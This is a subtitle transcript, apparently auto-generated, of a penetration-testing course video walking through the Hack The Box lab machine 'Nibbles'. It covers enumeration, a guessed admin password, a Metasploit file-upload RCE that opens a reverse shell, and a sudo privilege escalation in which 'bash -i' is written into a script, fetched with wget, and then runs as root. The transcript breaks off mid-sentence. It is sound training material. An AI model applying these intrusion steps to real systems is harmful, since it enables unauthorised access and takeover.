1 00:00:00,120 --> 00:00:01,860 So welcome to walk through. 2 00:00:01,860 --> 00:00:05,590 Number six we're really working on a machine called nibbles. 3 00:00:05,670 --> 00:00:07,760 So nibbles is at ten ten. 4 00:00:07,820 --> 00:00:08,340 Ten. 5 00:00:08,490 --> 00:00:11,670 Seventy five is a Linux machine. 6 00:00:12,120 --> 00:00:17,940 So go ahead and get your and map scan started now and we're going to be doing this for the last five 7 00:00:17,940 --> 00:00:19,300 videos of the course. 8 00:00:19,320 --> 00:00:25,260 So start your end map scan now and then go ahead and join when you are ready to go your end that results 9 00:00:25,320 --> 00:00:26,250 are back. 10 00:00:26,250 --> 00:00:31,980 If you're just following along that's absolutely OK just go ahead and let the video play through. 11 00:00:31,980 --> 00:00:35,030 If you're scanning go ahead and join us when your scan is ready. 12 00:00:35,040 --> 00:00:37,360 I'll see you over when you're done. 13 00:00:37,380 --> 00:00:37,790 All right. 14 00:00:37,800 --> 00:00:44,670 Now on our Kelly machine taking a look at our map scan we see that there are two ports that have returned. 15 00:00:44,670 --> 00:00:47,450 One is Port 22 which is SSA H. 16 00:00:47,460 --> 00:00:50,910 And the other is port 80 which is H TTP. 17 00:00:51,090 --> 00:00:53,640 Now in this scenario it's actually quite common. 18 00:00:53,640 --> 00:00:59,550 And we've talked about it in previous videos where you see something like Port 20 to import 80 and that's 19 00:00:59,550 --> 00:01:07,380 it in this vector especially on easy machines like this for capture the flag typically port 80 is the 20 00:01:07,410 --> 00:01:14,250 way in and port twenty two would be utilized in some way later on you might get a reverse shell in port 21 00:01:14,280 --> 00:01:21,660 80 you might find credentials on port 80 something here might lead us to a nice shell here later on. 22 00:01:21,660 --> 00:01:27,100 Typically the version of SSA age is not the way in. 23 00:01:27,170 --> 00:01:31,960 There's not like usually RC E's or remote code execution on versions. 24 00:01:31,980 --> 00:01:35,990 So we could search definitely eyes open SDH and see if there's anything out there. 25 00:01:36,030 --> 00:01:41,600 My guess would be there isn't on top of that we see that there is Ubuntu running on the machine. 26 00:01:41,610 --> 00:01:46,130 So this would be useful information for us just during information gathering process. 27 00:01:46,230 --> 00:01:51,060 So we'll store this in our back pocket and note that it's running Ubuntu on the back end. 28 00:01:51,060 --> 00:01:56,220 So we already know we're up against a Linux machine on top of that we can kind of tell we're against 29 00:01:56,220 --> 00:01:59,940 a Linux machine with the SSA and the Apache here. 30 00:01:59,940 --> 00:02:05,430 So again open to showing here on this HP Service. 31 00:02:05,550 --> 00:02:11,330 So a couple things that we can do is we can look for exploits against Apache as well. 32 00:02:11,700 --> 00:02:17,180 So for example in the tool that I haven't shown you but wanted to show you is a tool called Search split 33 00:02:18,260 --> 00:02:22,950 so we could say hey we've got Apache open and maybe we want to just quickly. 34 00:02:22,970 --> 00:02:23,600 No. 35 00:02:23,600 --> 00:02:26,800 Is there any kind of exploits for this two point four point one eight. 36 00:02:27,290 --> 00:02:33,230 Well we come down here and we can start typing in search point and just go ahead and tab and autocomplete. 37 00:02:33,800 --> 00:02:38,990 Now the thing I will say about search Boy is that you don't have to be very specific if you're very 38 00:02:38,990 --> 00:02:40,490 specific with your query. 39 00:02:40,850 --> 00:02:42,980 It's actually worse off for you. 40 00:02:43,610 --> 00:02:48,620 And I'll show you an example so if you say Hey I'm up against Apache two point four point one eight 41 00:02:50,000 --> 00:02:55,250 it's going to say I didn't find anything but if we back that out a little bit and we say hey we're against 42 00:02:55,250 --> 00:02:58,360 Apache two point four OK. 43 00:02:58,430 --> 00:03:04,040 Now some stuff starts showing up when we get very version specific like this we might actually miss 44 00:03:04,130 --> 00:03:10,490 some details in terms of exploits as you can see here there's an exploit right here from two point four 45 00:03:10,490 --> 00:03:15,830 one seven to two point four point three eight and this two point four point one eight actually falls 46 00:03:15,830 --> 00:03:17,570 in line in here. 47 00:03:17,570 --> 00:03:23,520 So it's important to note that let's not be too specific if we use this search by tool. 48 00:03:23,600 --> 00:03:29,150 Now what search Boyd is doing is it's pulling down from exploit database which is actually already pulled 49 00:03:29,150 --> 00:03:35,000 down and updates on your machine since Cally the owners of Kelly landings also run exploit database. 50 00:03:35,000 --> 00:03:40,550 They have a nice little repository of all the exploits that are on exploit database on your machine. 51 00:03:40,550 --> 00:03:46,460 So we're just doing an offline search here we don't you have to touch the Web to do this search in any 52 00:03:46,460 --> 00:03:49,870 exploit that has been pulled down is available on your machine. 53 00:03:49,880 --> 00:03:52,740 You can see we have a shell script here P. 54 00:03:53,090 --> 00:03:59,230 If we see a derby for Ruby that means tremendous flight module most of the time so we could see those 55 00:03:59,230 --> 00:04:00,290 things as well. 56 00:04:00,310 --> 00:04:05,010 And for example on this exploit we can tell some other things as well. 57 00:04:05,140 --> 00:04:09,180 It's a exploit for Linux that's good that checks a box but it's a local exploit. 58 00:04:09,190 --> 00:04:14,530 Meaning we have to be on the machine or some sort of already have access to it. 59 00:04:14,530 --> 00:04:14,830 Right. 60 00:04:14,830 --> 00:04:16,470 To exploit this. 61 00:04:16,480 --> 00:04:17,880 So this isn't going to work for us. 62 00:04:17,930 --> 00:04:21,020 We're more after a remote exploit of some sort. 63 00:04:21,250 --> 00:04:26,530 And we're really not after any kind of denial of service exploits typically especially in a real pain 64 00:04:26,530 --> 00:04:27,610 test those are out of scope. 65 00:04:27,640 --> 00:04:34,110 But when we're talking about having a capture the fly like we're doing here these are really IOSCO. 66 00:04:34,150 --> 00:04:37,330 We don't want to deny service to our box there's no point in doing that. 67 00:04:37,420 --> 00:04:42,790 Now say this was a two point four point one seven and we know it's vulnerable to denial service on a 68 00:04:42,790 --> 00:04:43,360 report. 69 00:04:43,360 --> 00:04:44,790 We would actually write this up. 70 00:04:44,800 --> 00:04:46,480 We'd absolutely write it up. 71 00:04:46,480 --> 00:04:52,300 We would note Hey you know this version is vulnerable to X Y and Z including denial service see these 72 00:04:52,750 --> 00:04:56,960 write ups here as to what can happen if it was running on Windows. 73 00:04:57,130 --> 00:05:01,390 So let's go ahead and do a little bit of further enumeration. 74 00:05:01,390 --> 00:05:06,310 I don't think Apache two point four point one eight is actually the way in here. 75 00:05:06,400 --> 00:05:15,750 So if we go out to the inter webs and we just say 10 not tend to attend that seventy five and we get 76 00:05:15,750 --> 00:05:18,010 a hello world OK. 77 00:05:18,020 --> 00:05:20,290 So not a lot to go on here. 78 00:05:20,330 --> 00:05:25,850 There is a few things that I always do when I when I first get to a web page and I'm going to note that 79 00:05:25,850 --> 00:05:28,420 this box does teach valuable lessons. 80 00:05:28,430 --> 00:05:34,700 Again we're starting to get off of the really really easy machines and this is still going to be easy. 81 00:05:34,700 --> 00:05:36,200 This is going to feel more. 82 00:05:36,230 --> 00:05:41,150 Capture the Flag like than anything else that we've done so far and that's OK. 83 00:05:41,160 --> 00:05:45,460 We're starting to get into some of these hack the box machines that are going to feel capture the flag 84 00:05:45,890 --> 00:05:52,520 and our take on this is going to be that from a realistic perspective as much as we can do. 85 00:05:52,670 --> 00:05:57,920 But there are going to be some methods along the way that we're going to encounter that are going to 86 00:05:57,920 --> 00:06:02,720 be capture the flag on top of that there's going to be homework that I'm going to give you a good machine 87 00:06:02,930 --> 00:06:09,230 here towards the end that I think is going to allow us I've skipped a couple machines that are really 88 00:06:09,230 --> 00:06:11,840 easy and kind of repetitive of what we've done. 89 00:06:12,050 --> 00:06:16,220 I'm going to get that as homework to allow us to test our knowledge and see where we need to fill in 90 00:06:16,220 --> 00:06:20,900 gaps and then we'll do a quick review video for that here in the future. 91 00:06:20,900 --> 00:06:29,750 But I'll give that out towards the end of the video so back into this session here few things that we 92 00:06:29,750 --> 00:06:36,240 can do from this point we can go ahead and start up Nick doe scan and do some vulnerability scanning 93 00:06:36,240 --> 00:06:37,630 and this web page. 94 00:06:37,630 --> 00:06:43,330 We can take the directory here and do some directory busting because if we do see this and this is all 95 00:06:43,330 --> 00:06:45,430 we have we don't have any links or anything. 96 00:06:45,430 --> 00:06:47,510 Maybe there's something running on the back end of this. 97 00:06:47,530 --> 00:06:53,710 The server here and we'll have to use directory busting to find that on top of that we can do some enumeration 98 00:06:53,710 --> 00:06:56,830 here if you have a tool called appetizer. 99 00:06:56,890 --> 00:06:59,130 Now appetizer is a great tool. 100 00:06:59,170 --> 00:07:02,070 You can see here that we've pulled down Apache new bun too. 101 00:07:02,170 --> 00:07:07,630 If you don't have an appetizer installed I do recommend just googling weapon Kaiser here and installing 102 00:07:07,630 --> 00:07:11,530 this plugin for your Firefox so from here. 103 00:07:11,540 --> 00:07:14,660 Let's go ahead and just right click and view the source. 104 00:07:14,660 --> 00:07:20,250 I said this to you guys before but again especially and capture the flags they like to hide little comments 105 00:07:20,250 --> 00:07:21,590 and the source code. 106 00:07:21,620 --> 00:07:27,110 This is a realistic perspective in the sense that we should be looking for comments and source codes 107 00:07:27,140 --> 00:07:28,350 by developers. 108 00:07:28,460 --> 00:07:33,050 We should be looking for hardcoded credentials and anything of value that might be in source code. 109 00:07:33,050 --> 00:07:38,030 So it's always important to look at the source code as you can see here there is a comment pointing 110 00:07:38,030 --> 00:07:40,580 to a naval blog directory. 111 00:07:40,780 --> 00:07:47,810 So where it is going to copy this and come over here and I'm just going to type it out but go into Naval 112 00:07:47,800 --> 00:07:55,730 blog not the IBM page just like this and you'll see that we are given this nice little blog here you 113 00:07:55,730 --> 00:07:56,450 can see navels. 114 00:07:56,460 --> 00:07:57,710 Yum yum. 115 00:07:57,770 --> 00:08:01,910 And we've got that hello world and not a whole lot of anything else. 116 00:08:01,910 --> 00:08:06,660 You got some categories we can click around enumerate see if there's anything here that we can do. 117 00:08:07,250 --> 00:08:09,420 And for the most part we are pretty stuck. 118 00:08:09,440 --> 00:08:17,140 We can view the source code and see if there's any information on this nibbles blog here if we can see 119 00:08:17,140 --> 00:08:20,670 any kind of version or what it's running on with a platform. 120 00:08:20,980 --> 00:08:23,590 I'm not seeing anything right off the bat. 121 00:08:23,680 --> 00:08:28,030 We'll come back and also look at the appetizer and see if there's anything of interest here. 122 00:08:28,060 --> 00:08:28,360 OK. 123 00:08:28,360 --> 00:08:29,050 It's running on J. 124 00:08:29,050 --> 00:08:29,590 Query. 125 00:08:29,590 --> 00:08:31,560 It's running on BHP. 126 00:08:31,690 --> 00:08:34,770 That may help us if we get some sort of exploit going for this. 127 00:08:35,230 --> 00:08:38,580 So in terms of what we see there's nothing readily available. 128 00:08:38,590 --> 00:08:41,070 I don't have anything to exploit. 129 00:08:41,140 --> 00:08:47,250 So the next thing that we would do here is we would do a quick search point on this. 130 00:08:47,380 --> 00:08:54,080 We can just say search boy I can type in the panel here search flight and we'll do say something like 131 00:08:54,080 --> 00:08:56,970 nibbles OK. 132 00:08:56,980 --> 00:08:57,580 That didn't work. 133 00:08:57,580 --> 00:08:59,380 How about nibble. 134 00:08:59,380 --> 00:09:01,820 See I got too specific there. 135 00:09:01,850 --> 00:09:02,120 OK. 136 00:09:02,150 --> 00:09:08,070 So it is actually called nimble blog and we can see that there's a couple of exploits out for it. 137 00:09:08,120 --> 00:09:15,570 One is a version three and it's got sequel injections on the web app and then we've got a four point 138 00:09:15,570 --> 00:09:22,100 zero point three that's very specific on an arbitrary file upload that allows remote code execution 139 00:09:22,790 --> 00:09:27,720 and it's a derby which means that this is a Metis flight module available. 140 00:09:27,830 --> 00:09:30,920 So what's the difference between these two. 141 00:09:30,920 --> 00:09:34,010 Well a single injection can lead to a shell. 142 00:09:34,120 --> 00:09:39,310 It can lead to database Dom say can lead to a lot of malicious stuff but not always. 143 00:09:39,350 --> 00:09:45,410 You could get sequel injection and not find anything of interest on the attack side. 144 00:09:45,410 --> 00:09:52,250 This thing here this arbitrary file upload with remote code execution way more juicy remote code execution 145 00:09:52,250 --> 00:09:57,950 means that we could be sitting at our house exploit this and get code execution and talk back to us 146 00:09:57,980 --> 00:09:59,990 without ever having to be local. 147 00:09:59,990 --> 00:10:00,380 OK. 148 00:10:00,400 --> 00:10:06,060 So in terms of the nastier exploit it's this all the way. 149 00:10:06,140 --> 00:10:11,840 Now we don't know what either these do but the one I would be eager to look at is this four point zero 150 00:10:11,840 --> 00:10:12,620 point three. 151 00:10:13,100 --> 00:10:17,540 So in order to do that I'm just going to boot up Mattis point really quick and we can actually load 152 00:10:17,540 --> 00:10:20,330 up that module and see a little bit more information. 153 00:10:20,360 --> 00:10:25,310 We could also go out to the Web and do this to look at the file and we could actually probably read 154 00:10:25,310 --> 00:10:27,530 the ruby file and pull the information down. 155 00:10:27,530 --> 00:10:35,120 But just in a clear cut way let's just search naval real quick and then we'll just copy this guy here 156 00:10:36,190 --> 00:10:44,340 and say use paste and then all we have to do is type info. 157 00:10:46,100 --> 00:10:52,010 So from info we can see the description here it says no blog contains a flaw that allows authenticated 158 00:10:52,160 --> 00:10:57,380 authenticated remote attacker to execute arbitrary BHP code. 159 00:10:57,380 --> 00:11:00,170 This was tested and four point zero point three. 160 00:11:00,170 --> 00:11:03,740 We've got a blog about it here we've got the details. 161 00:11:03,770 --> 00:11:04,890 Very interesting stuff. 162 00:11:04,910 --> 00:11:08,650 But if it says authenticated that means we need to authenticate. 163 00:11:08,840 --> 00:11:13,250 That means there's probably some sort of log in page somewhere. 164 00:11:13,280 --> 00:11:15,800 So what can we do here. 165 00:11:15,800 --> 00:11:20,180 Well we don't see an ad in panel or log in page or anything. 166 00:11:20,240 --> 00:11:25,670 We could just type in ad men and get lucky which is what I did right off the bat. 167 00:11:25,670 --> 00:11:28,740 I just typed an ad in that page and found it. 168 00:11:28,760 --> 00:11:35,750 Now there are other methods to doing this as well we could go into a new tab here and we could run something 169 00:11:35,750 --> 00:11:46,590 like a door buster and endure buster or we could copy this address here like this and just paste it 170 00:11:48,250 --> 00:11:55,310 and then add in the 80 at the end right here like this now my typical settings would be to say to go 171 00:11:55,310 --> 00:12:04,540 faster on this and we can browse to our file and do something like base here and then we're gonna go 172 00:12:04,540 --> 00:12:14,990 to user go to share and just start typing worried less so type in w o and you'll see word list comes 173 00:12:14,990 --> 00:12:22,960 up second in here there is a door buster folder I believe I've actually shown you guys this before but 174 00:12:23,240 --> 00:12:29,270 doesn't hurt to show it again and I always choose the medium list because I like to be as robust as 175 00:12:29,270 --> 00:12:37,480 possible we can start with the nibbles blog directory so we say nibble blog here. 176 00:12:37,870 --> 00:12:40,940 I keep calling it nibbles because that's the name of the machine but definitely never blog. 177 00:12:41,900 --> 00:12:44,160 And then we know it's a BHP extension. 178 00:12:44,270 --> 00:12:50,870 We could totally look for the just BHP if we wanted to look for more we could say like text back files 179 00:12:51,350 --> 00:12:59,960 zip files rar files PD f any kind of extension you want here just for the sake of purpose in time say 180 00:12:59,990 --> 00:13:06,250 we're just going to search for BHP and we'll go ahead and start that on the Neville blog itself. 181 00:13:06,370 --> 00:13:09,580 Now it's already finding a ton of info. 182 00:13:09,580 --> 00:13:11,960 We go to the tree view I like the tree view. 183 00:13:12,190 --> 00:13:15,910 You can see there is index admin install update site map. 184 00:13:16,800 --> 00:13:17,040 OK. 185 00:13:17,080 --> 00:13:22,590 So there's a lot of stuff here for for this in particular. 186 00:13:22,670 --> 00:13:28,370 Now we found the ad in the area by just guessing the admin area and if we did some research on the blog 187 00:13:28,400 --> 00:13:33,310 we probably could have found where the ad in Page was as well we could say hey Neville where where's 188 00:13:33,320 --> 00:13:35,620 nibble at the Neville blog at. 189 00:13:35,630 --> 00:13:36,860 Right. 190 00:13:36,860 --> 00:13:42,530 So we see some interesting information and you can see it's pulling down a ton of files through here 191 00:13:42,530 --> 00:13:43,370 as well. 192 00:13:43,520 --> 00:13:45,590 So I'm gonna go ahead and actually just stop this. 193 00:13:45,590 --> 00:13:47,850 We don't need to run this whole thing. 194 00:13:48,680 --> 00:13:52,970 So here here's some things we can do it read a novel blog admin area. 195 00:13:53,000 --> 00:13:55,760 Now this won't have default credentials right. 196 00:13:55,760 --> 00:13:58,160 This is somebodies personal blog. 197 00:13:58,520 --> 00:14:04,790 And in order to save time or it is going to talk through this process what we could do is build out 198 00:14:04,790 --> 00:14:12,020 a brute force similar to the last episode where recaptured or intercepted here and we attempted to we 199 00:14:12,020 --> 00:14:17,990 could use brb suite at an intruder right and tried to do a username and password something along the 200 00:14:17,990 --> 00:14:26,380 lines of admin or administrator and then use a common bad password list here and see if we can get in. 201 00:14:26,420 --> 00:14:34,220 We could also go to the naval blog page itself if we just go back let me delete this and we'll just 202 00:14:34,220 --> 00:14:40,740 go to Neville blog and we could come here and if there were actual blog information we can use a tool 203 00:14:40,740 --> 00:14:48,060 something like cool C E W L and try to pull down information we could pull down words off of this list 204 00:14:48,570 --> 00:14:55,740 and we can say hey what words do they use in their blog that maybe we can perhaps relate to them and 205 00:14:55,740 --> 00:15:01,410 use as a password we don't need to do that here there's not a lot but if we look at some words on here 206 00:15:01,530 --> 00:15:07,830 the password actually ends up being right here with nibbles so navels is going to be our password there's 207 00:15:07,830 --> 00:15:13,470 actually a time now I believe we enter into many incorrect users and passwords so we're not going to 208 00:15:13,470 --> 00:15:14,240 do that. 209 00:15:14,370 --> 00:15:21,360 And if you're interested in brute forcing with brb sweet episode 5 I believe it was the episode where 210 00:15:21,360 --> 00:15:25,380 we took brute forcing in we we used Barb sweet to do that. 211 00:15:25,680 --> 00:15:32,530 So let's just go ahead and type in admin and then lower case just type in Neville's and you'll see that 212 00:15:32,530 --> 00:15:37,490 we get access to the page so we have access. 213 00:15:37,500 --> 00:15:43,910 We need to determine if this is actually four point zero point three because that's important right. 214 00:15:43,920 --> 00:15:49,730 We need to know if this is the right version for us so we can go into settings here. 215 00:15:49,740 --> 00:15:54,030 If you just click around what you should be doing as well as enumerating this whole application. 216 00:15:54,210 --> 00:15:57,900 If you log into an application you should be looking at what you can do. 217 00:15:57,900 --> 00:15:58,950 Can you upload. 218 00:15:58,950 --> 00:16:01,060 Can you be malicious. 219 00:16:01,290 --> 00:16:06,120 You can manage pages or settings there's themes there's all kinds of stuff in here right. 220 00:16:06,120 --> 00:16:11,700 But if we come to the settings page here on the first settings tab and we scroll all the way down you 221 00:16:11,700 --> 00:16:15,260 could see that we are running Neville blog for point zero point three. 222 00:16:15,270 --> 00:16:16,110 This is money. 223 00:16:16,110 --> 00:16:18,210 This is confirmed right. 224 00:16:18,210 --> 00:16:19,500 We have what we need. 225 00:16:19,800 --> 00:16:21,690 We've got user credentials. 226 00:16:21,690 --> 00:16:24,710 We can effectively do this. 227 00:16:24,810 --> 00:16:26,250 So let's do this. 228 00:16:26,340 --> 00:16:28,870 Let's go back to our Metis void that we had. 229 00:16:28,880 --> 00:16:32,470 I'm going to close out this door buster here OK. 230 00:16:32,510 --> 00:16:36,050 So if we looked at our our options show out with our info as well. 231 00:16:36,290 --> 00:16:38,580 So we need a password required. 232 00:16:38,690 --> 00:16:40,160 We need to target your eye. 233 00:16:40,790 --> 00:16:41,240 OK. 234 00:16:41,240 --> 00:16:43,800 And we need a user name. 235 00:16:44,170 --> 00:16:46,410 So we also need our host. 236 00:16:46,490 --> 00:16:49,200 So we're gonna have to supply a few things here. 237 00:16:49,220 --> 00:16:55,270 Let's go ahead and set the password to nibbles. 238 00:16:55,460 --> 00:17:00,830 We'll set the username to admin we'll set the. 239 00:17:00,830 --> 00:17:09,450 Our host is it host or hosts our hosts to ten at ten ten seventy five. 240 00:17:10,150 --> 00:17:18,450 And I believe we're going to need to set the target your eye to add mend P HP and I could be incorrect 241 00:17:18,450 --> 00:17:19,510 here but we'll see. 242 00:17:22,500 --> 00:17:22,890 OK. 243 00:17:22,890 --> 00:17:26,340 Now let's show options again real quick. 244 00:17:28,020 --> 00:17:29,690 And we only have one target. 245 00:17:29,760 --> 00:17:31,070 This looks OK. 246 00:17:31,080 --> 00:17:33,330 Everything looks like we set it correctly. 247 00:17:33,330 --> 00:17:37,600 So let's go ahead and type run and see if that works OK. 248 00:17:37,600 --> 00:17:45,550 So that didn't work because I am dumb if you notice we're actually at navel blog slash admin. 249 00:17:45,550 --> 00:17:47,530 So let's set the target. 250 00:17:47,530 --> 00:17:53,810 You are I to let's just try and have a blog first and then I think it actually knows where the admin 251 00:17:53,870 --> 00:17:54,760 directory is. 252 00:17:55,150 --> 00:18:00,220 So let's just do for its national log and then we'll run this. 253 00:18:00,220 --> 00:18:00,880 There we go. 254 00:18:00,920 --> 00:18:07,980 Now we've got a session so you can see what it's doing is it's uploading a malicious image that BHP. 255 00:18:07,990 --> 00:18:10,600 And if you want to see where that's happening at. 256 00:18:10,600 --> 00:18:18,610 We come into our settings here and go into plug ins and under plugins there's a mind image if you actually 257 00:18:18,610 --> 00:18:23,560 go to configure here you could see that we have the ability to upload an image. 258 00:18:23,560 --> 00:18:28,300 Now this image we're uploading is a dot BHP that should not be happening right. 259 00:18:28,300 --> 00:18:34,580 We should have some sort of black listing going on or white listing on extensions that we want to run. 260 00:18:34,750 --> 00:18:39,490 But if we try to upload a BHP file we're allowed to do so since we're allowed to do that we can then 261 00:18:39,490 --> 00:18:44,750 call that BHP file execute it and get a reverse shell on this system. 262 00:18:44,950 --> 00:18:47,640 So easy easy breezy here. 263 00:18:47,650 --> 00:18:54,140 So now you've got a shell we can do this info and look at some information here so this is good information 264 00:18:54,140 --> 00:18:55,240 off the bat. 265 00:18:55,400 --> 00:19:02,240 We can see that we've got a four point four point zero Ubuntu to one of the four generic. 266 00:19:02,240 --> 00:19:06,670 We always want to look for this for privilege escalation purposes. 267 00:19:06,740 --> 00:19:11,150 So for not the high level user let's get our you idea real quick. 268 00:19:11,150 --> 00:19:13,820 We're not a high level user we're one thousand won here. 269 00:19:13,820 --> 00:19:16,740 So you can see nimbler we are not root. 270 00:19:17,150 --> 00:19:24,830 So we're going to need to do some prove ask one very very nice thing to do is to just search the Ubuntu 271 00:19:24,830 --> 00:19:27,200 on this and look for privacy. 272 00:19:27,560 --> 00:19:29,420 That's one of the first steps we would do. 273 00:19:29,690 --> 00:19:36,530 But let me go ahead and get into the machine will type shell and let's look at the present working directory 274 00:19:36,530 --> 00:19:37,960 or print working directory. 275 00:19:38,450 --> 00:19:38,890 OK. 276 00:19:38,930 --> 00:19:44,570 Let's go into the home folder and who am I. 277 00:19:44,570 --> 00:19:45,500 We are enablers. 278 00:19:45,500 --> 00:19:53,860 Let's see into nimbler and then let's just LSI real quick so let's Alana stash Ella. 279 00:19:53,880 --> 00:19:56,010 I see what's going on here. 280 00:19:56,290 --> 00:19:56,550 OK. 281 00:19:56,570 --> 00:20:01,130 So a couple of things we can grab the user dot text file here. 282 00:20:01,320 --> 00:20:08,390 We also have the ability to type out or sorry Cat the user dot text. 283 00:20:08,400 --> 00:20:13,000 We have the ability here to look at a few things. 284 00:20:13,000 --> 00:20:14,170 One that I always like to look at. 285 00:20:14,190 --> 00:20:16,020 Right off the bat is history. 286 00:20:16,670 --> 00:20:17,000 OK. 287 00:20:17,020 --> 00:20:18,440 The history commands not found. 288 00:20:18,440 --> 00:20:23,590 Now the history command would show us all the history that the user had typed previously. 289 00:20:23,590 --> 00:20:26,020 Now in this instance we don't have it. 290 00:20:26,020 --> 00:20:27,870 Commands I found that's fine. 291 00:20:28,030 --> 00:20:34,420 But in historical purposes you never know if a user typing in a password or so some source some sort 292 00:20:34,420 --> 00:20:35,690 of credentials there. 293 00:20:35,800 --> 00:20:38,200 I can't talk today apparently. 294 00:20:38,560 --> 00:20:43,840 Another place to look as you see that bash history we could as cat bash underscore history and see if 295 00:20:43,840 --> 00:20:44,950 there's anything there. 296 00:20:45,460 --> 00:20:47,930 And unfortunately there's not. 297 00:20:48,400 --> 00:20:51,010 So what can we do here. 298 00:20:51,010 --> 00:20:58,300 Well another thing that I like to do before I go searching and hunting for privacy is I like to do a 299 00:20:58,300 --> 00:21:04,430 pseudo dash owl and this might take a second on this machine as machines having a little bit of timeout 300 00:21:04,480 --> 00:21:05,530 issues. 301 00:21:05,590 --> 00:21:12,550 It could be with our outer shell that we have here since we don't have t y interaction but that's OK. 302 00:21:12,550 --> 00:21:15,350 Just give it a second. 303 00:21:16,240 --> 00:21:18,580 And once that happens we'll we'll take a look. 304 00:21:18,580 --> 00:21:21,930 But so pseudo dash L is for no passwords. 305 00:21:22,030 --> 00:21:27,650 So if you don't know it's sudo is pseudo is running as an admin or running a command or a privileges 306 00:21:27,660 --> 00:21:33,610 route or admin and it requires a password to do that. 307 00:21:34,030 --> 00:21:39,730 So if you're not familiar with Sudo maybe go back and learn some more Linux and just get a little bit 308 00:21:39,730 --> 00:21:41,980 more familiar with the basics of Linux. 309 00:21:42,220 --> 00:21:45,580 Here we're able to run a command without a password. 310 00:21:45,610 --> 00:21:52,300 So if we wanted to do something for example let's say cat ADC shadow we wanted to get a shadow file. 311 00:21:52,300 --> 00:21:53,760 Permission denied. 312 00:21:53,770 --> 00:21:56,040 Now we might be a member of the pseudo group right. 313 00:21:56,050 --> 00:22:02,830 And we could say pseudo at the shadow or the pseudo ours but we need to enter a password here and we 314 00:22:02,830 --> 00:22:03,600 don't know the password. 315 00:22:03,610 --> 00:22:05,300 We didn't get in with the password. 316 00:22:05,470 --> 00:22:11,590 So unless we stumble across the password or we figure out the password then we're kind of stuck. 317 00:22:11,830 --> 00:22:17,200 But we have the ability to run something without a password here and it's as monitored as age in our 318 00:22:17,200 --> 00:22:19,560 personal stuff folder. 319 00:22:19,960 --> 00:22:28,270 So we can stash L.A. again and you can see there is no personal or stuff folder so there's gonna be 320 00:22:28,270 --> 00:22:30,340 no monitor essays as well. 321 00:22:30,340 --> 00:22:36,760 What that means is we have the ability to create a shell script here in these folders and get malicious 322 00:22:37,480 --> 00:22:41,020 but a couple things before we actually root this machine. 323 00:22:41,020 --> 00:22:43,810 So this one's pretty straightforward on what it can do. 324 00:22:43,810 --> 00:22:48,040 And I think the next video we're going to do is going to be somewhere around the pseudo dash elegans 325 00:22:48,070 --> 00:22:52,330 you can see how these things sort of work and how we might have to do a little bit of investigative 326 00:22:52,330 --> 00:22:54,130 measures. 327 00:22:54,130 --> 00:22:58,050 So what we've got here is we've got some enumeration we could do. 328 00:22:58,050 --> 00:22:59,550 There's this personal Zip. 329 00:22:59,550 --> 00:23:04,510 And if in the back of your mind you're saying what's that personal zip perfect thought process right 330 00:23:04,540 --> 00:23:09,760 we should download this in a perfect world enumerate it see what's in there see if there's any password 331 00:23:09,760 --> 00:23:15,360 protections try to crack those etc. But just for the sake of time this video so doesn't run too long 332 00:23:15,370 --> 00:23:17,360 we're not gonna go down that rabbit hole. 333 00:23:17,770 --> 00:23:22,250 I'm going to show you the ways in now there are some good scripts out there. 334 00:23:22,270 --> 00:23:28,120 See it wasn't this obvious to us or there wasn't a pseudo dash L and there's no history and we search 335 00:23:28,150 --> 00:23:36,760 on the the we can type you name you name dash a we search on the you name here and we look for this 336 00:23:36,820 --> 00:23:42,640 this Ubuntu and Google and say hey privilege escalation on four point four point zero dash one or four 337 00:23:42,640 --> 00:23:45,040 generic and nothing comes up. 338 00:23:45,740 --> 00:23:49,200 OK that's another step that we could take others and exploits for this. 339 00:23:49,380 --> 00:23:50,480 None of that comes up. 340 00:23:50,500 --> 00:23:55,240 Well there are some great scripts out there and I'm going to leave you to do your own research on this 341 00:23:55,630 --> 00:24:06,630 but there is a script called Lynn in room that s h there is also a Linux crib checker dot pie. 342 00:24:06,640 --> 00:24:14,260 Both of these are absolutely gold when it comes to enumerating Linux most Ubuntu Linux machines come 343 00:24:14,260 --> 00:24:20,630 with Python install then almost always they can run shell right so they can run these bash scripts. 344 00:24:20,650 --> 00:24:27,400 So with that being said maybe a challenge to you in this video is to go find these download them and 345 00:24:27,400 --> 00:24:29,860 then transfer the files onto these machines. 346 00:24:29,860 --> 00:24:31,130 How do we transfer the files. 347 00:24:31,130 --> 00:24:37,010 Well we'll do an example real quick and then I'll let you figure out how to run these and execute them. 348 00:24:37,060 --> 00:24:42,260 So we need to create a malicious file that will allow us to run as root. 349 00:24:42,260 --> 00:24:50,830 Here we have a home nibble or we need to create a new folder called personal and we need to make a proceeds 350 00:24:50,830 --> 00:24:56,180 into that to make a new folder called stuff C.D. into stuff. 351 00:24:56,200 --> 00:25:00,070 And if we print the working directory OK we're there. 352 00:25:00,100 --> 00:25:04,120 So now we need to make a malicious file. 353 00:25:04,120 --> 00:25:04,760 Right. 354 00:25:04,810 --> 00:25:08,460 We've got a monitored sage we can do. 355 00:25:08,650 --> 00:25:13,270 We can do a touch monitored SDH or we can do. 356 00:25:13,290 --> 00:25:16,250 We can actually just echo a command into there if we want. 357 00:25:16,290 --> 00:25:26,460 We could echo bash dash II and we can just say put that into a monitored ice age something like this 358 00:25:27,180 --> 00:25:37,050 less and then you cat that monitor ice age and see that it just says Bashar I or dash I will explain 359 00:25:37,050 --> 00:25:37,850 this here in a second. 360 00:25:37,840 --> 00:25:39,750 Now I did say I was gonna do a file transfer. 361 00:25:39,750 --> 00:25:45,970 We could do the exact same thing with W get say we're over here and we we made that file. 362 00:25:45,990 --> 00:25:48,060 I'm just going to show you again. 363 00:25:48,060 --> 00:25:50,030 Say we all make it over here. 364 00:25:50,040 --> 00:26:00,940 Echo bash dash II into monitored SDH and OK we should be able to cap monitored. 365 00:26:00,990 --> 00:26:02,530 Assange should be fine. 366 00:26:02,570 --> 00:26:12,120 Now we can start up Python dash and simple a CTP server on port 80 and I'm not going to actually grab 367 00:26:12,120 --> 00:26:15,020 this file but you guys should have seen this before right. 368 00:26:15,020 --> 00:26:17,410 Well we would just do a W get here or curl. 369 00:26:17,430 --> 00:26:29,010 If we need to w get on HP whatever your IP address is here slash monitored stage and I would get that 370 00:26:29,010 --> 00:26:34,580 file as well so we could use the echo command here and make it straightforward. 371 00:26:34,770 --> 00:26:38,280 So how do we exploit this now and what are we doing. 372 00:26:38,280 --> 00:26:44,430 Why did I just do this bash Dash I will bash Dash I just means bash interactive what we're about to 373 00:26:44,430 --> 00:26:52,620 do with a pseudo command is we can run 